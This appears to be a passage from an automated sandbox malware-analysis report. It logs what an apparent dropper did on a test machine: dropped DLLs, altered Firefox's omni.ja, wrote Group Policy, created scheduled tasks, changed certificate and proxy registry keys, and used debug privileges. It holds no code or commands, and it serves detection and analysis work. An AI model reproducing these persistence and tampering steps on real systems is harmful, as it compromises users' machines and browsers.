File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\tYlulnlhfvUn\erYfueB.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\pNvkEBQ.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\OiJitsNRDAtU2\QwBUIHTcIGbxW.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files (x86)\bHChqWbaifmeC\HKEOgRB.dll C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\azeUktJAaUwkEYH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\CtcwvJUdbvqSdFcLs.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eKTzntQiDjkvtKkfQ.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f429969b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A
N/A N/A C:\Windows\Temp\HbtuuClNkkkdGbCN\vXAtqRxyFYwdzWO\SYnDWRn.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
